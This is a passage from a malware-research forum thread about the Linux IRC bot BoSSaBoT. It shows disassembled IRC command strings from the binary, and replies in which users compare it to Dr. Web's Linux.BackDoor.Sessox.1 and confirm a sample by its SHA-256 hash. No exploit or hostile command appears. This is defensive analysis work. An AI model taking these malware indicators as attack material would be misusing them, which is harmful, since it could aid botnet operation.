.rodata:0x804C7FE a376            db '376',0
.rodata:0x804C802 a433            db '433',0
.rodata:0x804C806 a422            db '422',0
.rodata:0x804C80A aPrivmsg        db 'PRIVMSG',0
.rodata:0x804C812 aPing           db 'PING',0
.rodata:0x804C817 aNick           db 'NICK',0
.rodata:0x804C81C aTopic          db 'TOPIC',0
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby Blaze » Tue Apr 14, 2015 1:01 pm

New Linux Trojan dubbed Linux.BackDoor.Sessox.1 by Dr. Web, but looks like BossaBot in my opinion.


Can anyone confirm, samples attached.
You do not have the required permissions to view the files attached to this post.
Follow me on Twitter: @bartblaze
User avatar
Blaze
 
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Linux/BoSSaBoT

Postby malwarelabs » Tue Apr 14, 2015 1:07 pm

Blaze wrote:New Linux Trojan dubbed Linux.BackDoor.Sessox.1 by Dr. Web, but looks like BossaBot in my opinion.


Can anyone confirm, samples attached.


I've only check the sample fe8e3c7d528d5295a2338aeba213465accd3d6d82a986581a38adf0de70e6394 and yes it's BoSSaBot
Image
malwarelabs
 
Posts: 44
Joined: Tue Dec 10, 2013 9:07 am
Reputation point: 18


Return to Malware

Who is online

Users browsing this forum: Gladiator, Google [Bot] and 5 guests